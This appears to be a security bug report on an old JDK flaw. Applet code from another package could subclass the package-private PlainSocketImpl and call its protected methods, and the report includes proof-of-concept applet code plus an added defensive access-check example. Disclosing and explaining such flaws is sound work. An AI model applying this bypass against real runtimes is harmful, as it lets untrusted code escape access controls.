This is a very serious security bug. It is directly exploitable by gaining access to
all the protected methods in PlainSocketImpl. There may be other ways to exploit it.

The problem is that any class can extend a class to which it is not supposed to have access
(for example, a class in package COM.microsoft can create a subclass of PlainSocketImpl,
even though PlainSocketImpl is a friendly, i.e. package-private, class in package java.net).

The JDK compiler will not allow such a class to compile, but that is easily bypassed either
by modifying bytecodes, or by recompiling PlainSocketImpl to be public and then compiling
the attack code.

The following code will compile in an environment where java.net.PlainSocketImpl
is public and will run in an environment where it is friendly.
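
// TestApplet.java
import java.applet.Applet;

public class TestApplet extends Applet {
    public void init() {
        MySocketImpl msi = new MySocketImpl();
        msi.doNasty();
    }
}

// MySocketImpl.java
// Subclass in a different package than java.net; the runtime should reject it.
public class MySocketImpl extends java.net.PlainSocketImpl {
    public void doNasty() {
        try {
            // create() is a protected method inherited from PlainSocketImpl
            create(true);
        } catch (java.io.IOException e) {
            // ignored: the call above only needs to be reached
        }
        System.out.println("just called create");
    }
}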
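
The access rule that the runtime failed to enforce here can be written as a small check. This is an added example, not code from the original report or from the JDK. The class and method names are hypothetical, and java.lang.AbstractStringBuilder is used only as a stand-in for a package-private JDK class.

```java
import java.lang.reflect.Modifier;

// Added example (not JDK code): the superclass accessibility rule
// that the report describes as missing at class-load time.
// Assumption: only top-level classes are considered.
public class SuperclassAccessCheck {

    // Package part of a binary class name; "" for the unnamed package.
    static String packageOf(Class<?> c) {
        String name = c.getName();
        int dot = name.lastIndexOf('.');
        return dot < 0 ? "" : name.substring(0, dot);
    }

    // True if 'sub' may legally name 'sup' as its direct superclass:
    // 'sup' is public, or both are in the same runtime package
    // (same package name AND same defining class loader).
    static boolean mayExtend(Class<?> sub, Class<?> sup) {
        if (Modifier.isPublic(sup.getModifiers())) {
            return true;
        }
        return packageOf(sub).equals(packageOf(sup))
                && sub.getClassLoader() == sup.getClassLoader();
    }

    // Audit an already-loaded class against its actual superclass.
    static boolean superclassIsAccessible(Class<?> c) {
        Class<?> sup = c.getSuperclass();
        return sup == null || mayExtend(c, sup);
    }

    public static void main(String[] args) {
        // Package-private class in java.lang, used as a stand-in.
        Class<?> hidden = StringBuilder.class.getSuperclass();

        // Same package and loader: allowed.
        System.out.println(mayExtend(StringBuilder.class, hidden));
        // Class from another package extending a package-private class:
        // the case in this report, which must be rejected.
        System.out.println(mayExtend(SuperclassAccessCheck.class, hidden));
        // Public superclass in another package: allowed.
        System.out.println(
                mayExtend(SuperclassAccessCheck.class, java.net.SocketImpl.class));
        System.out.println(superclassIsAccessible(SuperclassAccessCheck.class));
    }
}
```

The class-loader comparison matters because two classes with the same package name but different defining loaders are not in the same runtime package.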